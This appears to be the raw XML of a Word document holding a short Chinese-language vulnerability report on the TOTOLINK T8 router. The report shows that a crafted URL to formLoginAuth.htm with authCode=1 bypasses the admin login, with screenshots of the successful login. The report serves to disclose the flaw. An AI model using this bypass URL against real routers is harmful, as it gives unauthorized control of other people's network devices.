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BA58" w14:textId="44706F2C" w:rsidR="0040755A" w:rsidRDefault="0040755A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TOTOLINK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以不输入管理员密码即可登录路由器管理页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E81252" w14:textId="2865BF5B" w:rsidR="001366E9" w:rsidRDefault="0040755A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AA55122" wp14:editId="74EDF6F0">
            <wp:extent cx="5274310" cy="282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CDC3" w14:textId="112942FD" w:rsidR="0040755A" w:rsidRDefault="0040755A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造以下url即可绕过登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB992E" w14:textId="6FE8247D" w:rsidR="009876EF" w:rsidRDefault="009876EF">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00D84279">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.0.1/formLoginAuth.htm?authCode=1&amp;action=login</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FECB5E5" w14:textId="0A549FF9" w:rsidR="009876EF" w:rsidRDefault="009876EF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73A98821" wp14:editId="3D5BEB09">
            <wp:extent cx="5274310" cy="1857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D5EB" w14:textId="242CDE72" w:rsidR="009876EF" w:rsidRDefault="009876EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685E909B" w14:textId="713B4803" w:rsidR="009876EF" w:rsidRPr="009876EF" w:rsidRDefault="009876EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A4686FD" wp14:editId="7F1046ED">
            <wp:extent cx="5274310" cy="1779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6EF" w:rsidRPr="0098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9"/>
    <w:rsid w:val="001366E9"/>
    <w:rsid w:val="0040755A"/>
    <w:rsid w:val="0098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5829"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8CE76DB8-C9C9-45A5-9221-A5D34806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6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7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92.168.0.1/formLoginAuth.htm?authCode=1&amp;action=logi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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-31T13:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-31T13:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>